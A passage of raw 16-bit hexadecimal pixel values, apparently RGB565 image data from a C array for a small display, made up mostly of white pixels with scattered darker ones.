0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xbe7c, 0x5bb4, 0x3aed, 0x4b4d, 0x4aed, 0x73f3, 0xd6ff, 0xf7ff, 0xefff, 0xf7df, 0xffdf, 0xffdf, 0xf7de, 0xf7bf, 0xf7bf, 0xffbf, 0xffbc, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xf7df, 0xf7ff, 0xf7ff, 0xa5f9, 0x3aad, 0x3aae, 0x5351, 0x5b91, 0x324c, 0x3b0f, 0xbeff, 0xdfff, 0xe7ff, 0xe7ff, 0xefff, 0xf7ff, 0xffff, 0xffde, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xf7ff, 0x969e, 0x13b5, 0x5cd5, 0xdfff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xffff, 0x53b3, 0x12d3, 0x1b14, 0xd7df, 0xfffc, 0xffbe, 0xe7ff, 0x33b8, 0x1317, 0x0a71, 0xb6be, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xefff, 0x43d1, 0x02b3, 0x3b93, 0xe7bf, 0xf7ff, 0xc77f, 0x2b93, 0x33b4, 0xdfff, 0xefff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff,
0xfffd, 0xf7ff, 0xf7ff, 0xffdf, 0xffde, 0xe7ff, 0x6e1d, 0x1394, 0x757a, 0xf7ff, 0xffdf, 0xffff, 0xf7ff, 0xc75f, 0x0a2f, 0x33da, 0xf7ff, 0xc6bc, 0x4af1, 0x42b0, 0x84b6, 0xf7ff, 0xcefc, 0x3aae, 0x42f0, 0x84d7, 0xf7ff, 0xa5b9, 0x42ef, 0x3af0, 0x9537, 0xffff, 0x965f, 0x122f, 0x5c35, 0xe7ff, 0xae5f, 0x19cd, 0x74b7, 0xe7ff, 0xefdf, 0xffff, 0xf7de, 0xc79f, 0x1394, 0x1bf7, 0xd7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdd, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0x4aee, 0x42cf, 0xae5d, 0xd7ff, 0xd7ff, 0xdfff, 0xaddb, 0x3a2d, 0x63f3, 0x7cd6, 0x6392, 0x73b3, 0xbdda, 0xf7df, 0xf7ff, 0xefff, 0xf7fe, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xf7ff, 0xf7ff, 0x3a8c, 0x4b0f, 0xd73f, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7df, 0xc6de, 0x2a2c, 0x4b91, 0x32ae, 0x2a6d, 0x328d, 0x7473, 0xefff, 0xffff, 0xf79e, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffff, 0xd7ff, 0x33d5, 0x0b72, 0xc7ff, 0xf7ff, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xcefe, 0x2ad0, 0x01cd, 0xcf9f, 0xf7ff, 0xffdb, 0xffde, 0xf7df, 0xaebf, 0x01f0, 0x1ab1, 0xb6bf, 0xf7ff, 0xffdf, 0xffff, 0xffdf, 0xf7bf, 0xffdf, 0xffdf, 0xf7df, 0xcfbf, 0x12d0, 0x0271, 0x9dfa, 0xfffe, 0xe7ff, 0x5d7a, 0x1bb5, 0x7d7a, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf,
0xffde, 0xffff, 0xf7ff, 0xfffe, 0xfffe, 0xf7ff, 0xc7bf, 0x2bf6, 0x1354, 0xcfff, 0xf7ff, 0xffde, 0xffff, 0xcf5f, 0x020f, 0x3419, 0xf7fd, 0xbede, 0x09f1, 0x1a93, 0x5c15, 0xefff, 0xbefe, 0x1210, 0x1272, 0x5c36, 0xefff, 0x9dfb, 0x1251, 0x0211, 0x74b7, 0xffff, 0x9e9f, 0x0a0e, 0x5c36, 0xe7ff, 0xa63f, 0x19ee, 0x8519, 0xefff, 0xf7fe, 0xfffe, 0xe7ff, 0x6559, 0x0b54, 0x763f, 0xe7ff, 0xffbc, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0x4aee, 0x9537, 0xefff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xffff, 0xf7df, 0x7cb6, 0x9dfb, 0xc6ff, 0xbe3c, 0x6b71, 0x322c, 0xc6fd, 0xe7ff, 0xf7ff, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0x4b4f, 0x84d6, 0xf7ff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffdf, 0xadd9, 0xdfbf, 0xe7ff, 0xd7df, 0x8d58, 0x19a9, 0xc69c, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xefff, 0x8d9a, 0x03b5, 0x54f8, 0xefff, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffbd, 0xffff, 0x6cd7, 0x018b, 0xb6bd, 0xffff, 0xffde, 0xffde, 0xffdd, 0xffff, 0xf7ff, 0x74f8, 0x09ae, 0x851a, 0xf7ff, 0xffdf, 0xffde, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0x7d3a, 0x01af, 0x4c55, 0xf7ff, 0xffde, 0xd7ff, 0x0bb4, 0x13f6, 0xcfbf, 0xffff, 0xfffe, 0xefff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffdf,
0xffdf, 0xffff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xefff, 0x75dc, 0x0b95, 0x4d3a, 0xdfff, 0xffff, 0xffdf, 0xcf5f, 0x0a2f, 0x2c39, 0xf7fe, 0xc71f, 0x1273, 0x22b3, 0x74b6, 0xe7ff, 0xaeff, 0x0274, 0x02d7, 0x64fa, 0xe7ff, 0xa63b, 0x1a92, 0x12b4, 0x8539, 0xfffe, 0x9ebf, 0x120e, 0x5c35, 0xe7ff, 0xa63f, 0x1230, 0x6c97, 0xf7ff, 0xfffe, 0xefff, 0xa73f, 0x13b5, 0x2bf6, 0xcfdf, 0xf7ff, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbe, 0xfffe, 0xfffe, 0xffde, 0xffff, 0xefff, 0xefff, 0xa5da, 0x534f, 0xf7ff, 0xf7ff, 0xffbd, 0xffdf, 0xffff, 0xfffe, 0xffbc, 0xfffe, 0xf7ff, 0xe7ff, 0xe7df, 0xf7ff, 0xf7ff, 0xc69d, 0x21ea, 0xe7ff, 0xe7df, 0xf7df, 0xffff, 0xffdf, 0xffff, 0xffde, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xae7c, 0x3aee, 0xf7ff, 0xffdf, 0xffde, 0xffbd, 0xffff, 0xf7ff, 0xdf7e, 0xe71d, 0xe73d, 0xffff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xd73f, 0x320b, 0xd6fd, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7fe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xe79f, 0x1458, 0x1b94, 0xbf3f, 0xffff, 0xffde, 0xffff, 0xf7ff, 0xffff, 0xffde, 0xf7ff, 0x01aa, 0x7d9a, 0xefff, 0xfffe, 0xffde, 0xffdf, 0xffde, 0xffdd, 0xfffe, 0xefff, 0x8d5a, 0x118b, 0xcefd, 0xffff, 0xf7fd, 0xffff, 0xffde, 0xffbe, 0xffff, 0xcf1e, 0x0109, 0x5c18, 0xe7df, 0xffff, 0xefff, 0x5d39, 0x0394, 0x6e3d, 0xefff, 0xffbd, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf,
0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xffff, 0xcfdf, 0x2c57, 0x1395, 0x969e, 0xf7ff, 0xffff, 0xcf3f, 0x0a50, 0x2c3a, 0xf7ff, 0xefff, 0xe7ff, 0xefff, 0xefff, 0xefff, 0xaf3f, 0x0254, 0x02f7, 0x54da, 0xe7ff, 0xf7ff, 0xe7ff, 0xe7ff, 0xefff, 0xffff, 0x969f, 0x120e, 0x6c34, 0xe7ff, 0x9e5f, 0x0a51, 0x6cd8, 0xf7ff, 0xfffe, 0xdfff, 0x2c37, 0x0b55, 0x9ebf, 0xefdf, 0xffdd, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffbd, 0xffff, 0xf7df, 0xcf1f, 0x8d59, 0x2a0c, 0xcefd, 0xffff, 0xffdd, 0xffdf, 0xffde, 0xf7de, 0xfffe, 0xffdd, 0xfffd, 0xf7fe, 0xeffe, 0xffff, 0xf7be, 0xf7fe, 0xefff, 0x8d36, 0x7454, 0xefff, 0xf7ff, 0xffff, 0xf7df, 0xf7df, 0xffdf, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffbf, 0xffdf, 0xf7de, 0xf7ff, 0xefff, 0xc6de, 0x74d7, 0x224d, 0xa61a, 0xf7ff, 0xffdd, 0xffde, 0xffff, 0xc67b, 0x536f, 0x4b8f, 0x6c34, 0x5391, 0x4b0d, 0xa596, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xad99, 0x5b2f, 0xf7ff, 0xf7ff, 0xf7df, 0xfffe, 0xfffd, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x8edf, 0x1352, 0x3c35, 0xcfff, 0xf7ff, 0xffdd, 0xffde, 0xf7bf, 0xf7ff, 0x8536, 0x43b0, 0xdfff, 0xf7ff, 0xffff, 0xffbe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xcefc, 0x6c10, 0xd71c, 0xffff, 0xf7bd, 0xfffe, 0xffdf, 0xce9b, 0x3a4b, 0xadfa, 0xefff, 0xffdd, 0xefff, 0x8e7f, 0x0b54, 0x3435, 0xd7ff, 0xefff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdd, 0xfffe, 0xefff, 0xaf1f, 0x1b53, 0x2b74, 0xb73f, 0xe7ff, 0xc73f, 0x1a90, 0x2bf9, 0xc71f, 0xc69c, 0xcebb, 0xd69a, 0xcebc, 0xbefe, 0x8e1e, 0x02b3, 0x0af4, 0x54b9, 0xc71f, 0xcebb, 0xd6bb, 0xcedd, 0xc6be, 0xc6df, 0x7dff, 0x1a4f, 0x6c33, 0xe7ff, 0x9e7f, 0x0a50, 0x64b6, 0xefff, 0xe7ff, 0x4435, 0x1b95, 0x4cd9, 0xdfff, 0xffff, 0xfffe, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xfffe, 0xfffe, 0xffde, 0xffff, 0xe75e, 0x428d, 0x3a8e, 0x9559, 0xa5b9, 0xefff, 0xffff, 0xfffe, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xf7de, 0xf7fd, 0xf7fe, 0xffdf, 0xffff, 0xf7dd, 0xf7ff, 0xf7ff, 0x1949, 0x7c53, 0xcefb, 0xffff, 0xffff, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xf7df, 0xdf5e, 0x322b, 0x42cf, 0x8d59, 0xa63c, 0xe7ff, 0xffff, 0xffbd, 0xffbe, 0xffdf, 0x8d17, 0xd7bf, 0xdfff, 0x969f, 0xbf7f, 0xdfff, 0x84b3, 0xef9d, 0xffbd, 0xffde, 0xf7bf, 0xef9f, 0x320a, 0x73f2, 0xbe7b, 0xf7ff, 0xf7df, 0xffdd, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xe7ff, 0x5cf7, 0x1374, 0x3c76, 0xdfff, 0xf7de, 0xffff, 0xf7ff, 0xdfbf, 0x32ab, 0xefff, 0xf7ff, 0xffff, 0xf7df, 0xffff, 0xf7fe, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xf7dd, 0xfffe, 0xf7ff, 0xefff, 0xf7df, 0xffff, 0xff9d, 0xffdf, 0xe75e, 0xf7ff, 0xf7ff, 0xf7fe, 0xffff, 0xb75f, 0x1395, 0x1b94, 0xbf5f, 0xf7ff, 0xf7df, 0xf7ff, 0xf7ff, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff,
0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xfffd, 0xf7dd, 0xf7ff, 0x8ddb, 0x1b75, 0x23d6, 0xb79f, 0xc77f, 0x09cc, 0x0a93, 0x0a10, 0x09cc, 0x11aa, 0x220b, 0x11ac, 0x09ae, 0x1271, 0x0ab2, 0x12f2, 0x0a71, 0x11ce, 0x21cd, 0x19cc, 0x11cd, 0x09cd, 0x11ef, 0x0232, 0x1a6e, 0x4b4f, 0xe7ff, 0x9e3e, 0x018c, 0x74d7, 0xd7ff, 0x54f9, 0x1375, 0x4477, 0xd7ff, 0xf7ff, 0xf7de, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xefbd, 0xf7ff, 0xe7bf, 0x324b, 0xbe5b, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xf7ff, 0xf7ff, 0xefdf, 0xf7ff, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xefbd, 0xefff, 0xefff, 0xdf5f, 0xa578, 0x4acc, 0x634e, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xefdf, 0x1948, 0xce9d, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xf7fe, 0xfffe, 0xffdf, 0xf7df, 0xf7ff, 0xae3a, 0x430d, 0x7518, 0x5c34, 0x7474, 0xefff, 0xf7ff, 0xfffe, 0xf79c, 0xfffe, 0xf7ff, 0xe77f, 0xb61b, 0x4aef, 0x428c, 0xefbf, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7bd, 0xfffe, 0xf7fd, 0xdfff, 0x3c36, 0x13b5, 0x5d7a, 0xdfff, 0xf7ff, 0xf7ff, 0xbe5a, 0xcedb, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffbe, 0xffff, 0xf7be, 0xffff, 0xffdf, 0xffbe, 0xffff, 0xffbe, 0xffde, 0xfffe, 0xefde, 0xf7ff, 0xaf7f, 0x23b4, 0x1b73, 0x85db, 0xf7ff, 0xf7bd, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7dd, 0xfffc, 0xffdc, 0xefff, 0x5d9e, 0x0377, 0x3457, 0xaefe, 0x74f8, 0x5cbb, 0x4c9c, 0x5d3d, 0x4cda, 0x4cbb, 0x5cbe, 0x5c7d, 0x5c9b, 0x54fa, 0x4cfa, 0x54ba, 0x5c9c, 0x5c9e, 0x4c9e, 0x54ff, 0x4cbc, 0x549b, 0x54dc, 0x5c76, 0x95b8, 0xe7ff, 0xbeff, 0x63f5, 0xa63c, 0x653a, 0x03b8, 0x245a, 0xbfbf, 0xf7fe, 0xf7fd, 0xf7ff, 0xffff, 0xffbf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xefff, 0x6c33, 0x8d36, 0xefff, 0xf7ff, 0xffff, 0xf7de, 0xdf1c, 0x94f6, 0xbe5c, 0xb638, 0xdf1d, 0xd6dd, 0x9d36, 0xa5d8, 0xae1b, 0xaddb, 0xdf7f, 0xad96, 0xb617, 0xc69b, 0x9d78, 0xe7bf, 0xf7ff, 0xffff, 0xf7bf, 0x8473, 0x73f1, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 